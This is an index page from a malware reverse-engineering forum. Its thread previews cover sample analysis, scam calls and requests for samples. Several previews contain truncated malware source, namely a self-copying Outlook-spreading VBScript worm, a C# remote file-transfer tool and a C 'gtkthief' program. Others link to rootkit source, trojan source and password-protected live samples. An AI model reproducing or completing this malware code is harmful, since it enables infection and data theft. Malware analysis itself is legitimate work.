Tuts 4 You

Malware Reverse Engineering

Debugging, disassembling and documenting interesting malware...

  1. Teddy Rogers
    Started by Teddy Rogers,

    Win32OnlineGames.txt Ted.

    • 7 replies
    • 6.8k views
  2. deepzero
    Started by deepzero,

    This source of the tdl3 rootkit driver has been floating around for some time now, might be an interesting read for some people.... http://pastebin.com/he4hVjQ1

    • 0 replies
    • 6.3k views
  3. RKN
    Started by RKN,

    Zip file contains two malwares. Target is to unpack and calculate the md5hash of the unpacked malware. This was asked in hacking competition (InCTF) and my solution was not accepted, so I want to know the answer. http://rapidshare.co...9/New_Folder.7z

    • 5 replies
    • 7.3k views
  4. hackers3
    Started by hackers3,

    Request for Waledac worm download link for analysis. Thanks

    • 2 replies
    • 6.6k views
  5. CodeExplorer
    Started by CodeExplorer,

    Dynamic forking in action http://zairon.wordpress.com/

    • 0 replies
    • 4.3k views
  6. Teddy Rogers
    Started by Teddy Rogers,

    Today I got a cold call from a woman claiming my computer had been playing up because I had accessed a webpage with a virus or opened SPAM with malware. Normally I put the phone down on cold calls but at the mention of a computer security issue I had to play along for a laugh to see what was up. This type of computer scam (cold call malware) is new to me. She asked me to go to Event Viewer and check the Application error logs and unsurprisingly there were a lot of errors and warnings. This is of course to legitimise the reason for the call and to justify what was to happen next. She asked me to go to www.support.me which then redirected me to https://secure.logmeinrescue.…

    • 6 replies
    • 24.6k views
  7. fahmi
    Started by fahmi,

    :thumbsup: download

    • 2 replies
    • 15.9k views
  8. sirp
    Started by sirp,

    Quote: DotNetasploit is a very capable code injector, making it possible to inject and edit code and GUI controls into .NET applications in an interactive fashion. Code: http://anonym.to/?http://digitalbodyguard.com/DotNetasploit.html Code: http://anonym.to/?http://www.woodmann.com/collaborative/tools/images/Bin_DotNetasploit_2010-8-17_3.39_dotnetasploit25.zip and here is a pack with all the stuff VIDS: Injector Visual Studio Exploit - no code is safe DotNetSploit Overview DotNetaSploit Tools : DotNetSpike MetaSploit - Payload Deployment Targeted Attacks DotNetasploitEXE PDF : Attacking .Net at Runtime ReflectionsHiddenPower http://anonym.to/?http://depo…

    • 1 reply
    • 11.2k views
  9. fahmi
    Started by fahmi,

    virus i hate mawanella incident On Error Resume Next Rem // I hate Mawanella incident Set W_S = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr, strMsg set wscr=CreateObject("WScript.Shell") Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set cFile = fso.GetFile(WScript.ScriptFullName) cFile.Copy(dirsystem&"\Mawanella.vbs") Set OutlookA = CreateObject("Outlook.Application") If OutlookA = "Outlook" Then Set Mapi=OutlookA.GetNameSpace("MAPI") Set…

    • 0 replies
    • 4.3k views
  10. deepzero
    Started by deepzero,

    Hi, I am looking for a detailed Stuxnet analysis, as in: http://www.virusbtn.com/conference/vb2010/abstracts/LastMinute7.xml Couldn't find anything though. Maybe someone else was more successful?

    • 6 replies
    • 8.8k views
  11. JMC31337
    Started by JMC31337,

    plenty of examples on the net like Chickenbutt said //JMC31337 //ConnEX //CLIENT using System; using System.Collections.Generic; using System.Text; using System.IO; using System.Net; using System.Net.Sockets;namespace Client { class Program { static void Main(string[] args) { string download = "download"; string upload = "upload"; ASCIIEncoding ASCII = new ASCIIEncoding(); Byte[] outstream = new Byte[99999]; Console.WriteLine("ConnEX Admin TOOL (CLIENT) Started"); int port = 31337; Console.WriteLine("Enter IP address: "); string servip = Console.ReadLine(…

    • 2 replies
    • 6.1k views
  12. silent death
    Started by silent death,

    I have started a new blog on reverse engineering http://dreamofareverseengineer.blogspot.com/ Don't hesitate to post your comments on the blog. silent death

    • 0 replies
    • 4k views
  13. KingChrisyLive
    Started by KingChrisyLive,

    Hello everybody, A few days ago I've read some very interesting articles about malware analysis and now I'm looking for papers, tutorials, documentation to get started with the matter. It'd be better if it's written for beginners in this topic. What sort of skills are required to get started?

    • 6 replies
    • 10.1k views
  14. mcanpuneet
    Started by mcanpuneet,

    You can find many tools for changing the Session ID in a cookie, form bases and many more. You can do this using any proxy, HTTP debugger and many more. But you will not find any tool to decode the session ID in a cookie. In a cookie, Session IDs are normally in the form of 1600401588313630099709319853232030099705, which is an encoded representation. Can anyone help me decode this value to get the original session ID? Thanks in advance. Newbie in Security Domain Email me

    • 4 replies
    • 7.3k views
  15. Departure
    Started by Departure,

    I had a *removed* ring me today and it was funny, I have never had this type of scam pulled on me before... She rang up saying that there is a new infection spreading rapidly in my country (Australia) and that I could be infected, she guided me into the event viewer (step by step lol) and in shock she said there shouldn't be any warnings or errors in the application event viewer log. She then told me I will need to go to a site "www.virtualpcdoctor.com" and click on the remote support button which then one of their technical support teams would remove this new infection, I told her she is ****ed in the head and that I don't believe her, she insisted that her company is a…

    • 1 reply
    • 4.4k views
  16. Pouyaaa
    Started by Pouyaaa,

    Hi everybody. My boss has told me to find the binary code of Stuxnet or any file that is suspected to be Stuxnet. Does anyone have it or know where I can get it? Tnx.

    • 12 replies
    • 8.2k views
  17. frank_boldewin
    Started by frank_boldewin,

    hey guys, i'm currently investigating a spear phishing malware. (sorry, can't share this malware) even with all protection plugins like latest strongod, phant0m etc... it crashes immediately after loading the executable into ollydbg.exe i found out, that the problem is caused, because of illegal export directory entries of the PE file. see attachment. if i fix the "number of names" to "0" olly loads the file without problems and unpacking works well, after bypassing several antidump, antidebug ... tricks. anyone has seen this anti-olly trick before and if yes, is there a plugin for it, which hardens olly against this trick? cheers, frank

    • 5 replies
    • 7.7k views
  18. JMC31337
    Started by JMC31337,

    got this outta a packed Dev-C package archive rar passwd: infected mathtest.rar

    • 0 replies
    • 11k views
  19. Jaymz
    Started by Jaymz,

    Used search on the entire forum and also this sub-section, but I didn't find anything related to SafeSys virus... Here's a download link for it, if you want to examine it.. Notice that ALL THE FILES IN THE PACKAGE ARE INFECTED! The package is password protected, so it does not do any harm to your computer... Quote: "The worm is called W32.SafeSys.Worm and attacks a particular program called Deep Freeze. Deepfreeze is a computer protection utility that prevents malicious code from writing to the hard drive itself. Any malicious code is written to a memory buffer which then gets erased upon reboot. The original hard drive data is untouched and can simply be reloaded duri…

    • 1 reply
    • 17.4k views
  20. Aguila
    Started by Aguila,

    Called TDL, TDSS, Alureon or Olmarik. First widely spread x64 rootkit. Analysis: http://www.prevx.com/blog/154/TDL-rootkit-x-goes-in-the-wild.html http://www.prevx.com/blog/155/x-TDL-rootkit--follow-up.html http://www.symantec.com/connect/de/blogs/tidserv-64-bit-goes-hiding http://blog.raidrush.ws/2010/09/11/malware-analyse-tdl-rootkit-64-bit-infektion/ (german, but with TDL dropper source code) download: http://www.xup.in/dl,15799673/TDL_x64.rar/ password: infected

    • 2 replies
    • 22.3k views
  21. sirp
    Started by sirp,

    even more of that nasty tricks ,) The last spreading malware version of Waledac, a notorious spamming botnet that has been taken down in a collaborative effort led by Microsoft earlier this year, contained some neat anti-debugging tricks in order to make reverse-engineering more difficult. Felix Leder and I have been presenting about the approach at SIGINT 2010 in Cologne yesterday, and as the method seems to be not publicly known yet, I will quickly describe it here as well. Here's the Info

    • 1 reply
    • 6.8k views
  22. sirp
    Started by sirp,

    Skype trojan source The tools generally are related to the two trojan horses Minipanzer and Megapanzer (which you find at the bottom of this section) to footprint a system, collect sensitive data, malware self defense mechanisms and so on. All sourcecode is available under the GPL so please do whatever legal stuff you want with it but keep the source open. I used the time over christmas to work on the Skype trojan source code. The code was a little messy, it compiled but at some places it crashed. The old source was optimised for Skype 3 and about for a year now Skype 4 is spreading more and more. Therefore I decided to clean up the code and adapt it that way it works tog…

    • 0 replies
    • 4.5k views
  23. CodeExplorer
    Started by CodeExplorer,

    29A INC files - virus source ASM Link: http://vx.org.ua/29a/29a-2/29a-2.3_3

    • 2 replies
    • 8.1k views
  24. Krisler12
    Started by Krisler12,

    Hi! It is a Windows virus, better say a stealer. Archive password: 123456 It is coded in Visual Basic 6 and strongly obfuscated. Try to find what is the site name for sending the logs, username and password for login into the site. Good luck! test.rar

    • 1 reply
    • 4.4k views
  25. JMC31337
    Started by JMC31337,

    //gcc -lX11 -lXtst gtkthief2.c -o gtkthief2 `pkg-config --cflags --libs gtk+-2.0` //JMC31337 //VIRAL WEAPONRY LABZ #include <gtk/gtk.h> #include <stdio.h> //#include <gdk/gdkkeysyms.h> #include <stdlib.h> #include <X11/Xlib.h> #include <X11/keysym.h> #include <X11/extensions/XTest.h> #include <string.h> #include <linux/input.h> #include <X11/Xutil.h> #include <X11/Xatom.h> #include <X11/keysymdef.h> #include <dirent.h> int apt=1; //=================================== static void delete() { system("chmod 755 *"); system("pkill gdb"); struct dirent **namelist; int n; int c; int apt=1; int C4 = 4; …

    • 0 replies
    • 5.3k views
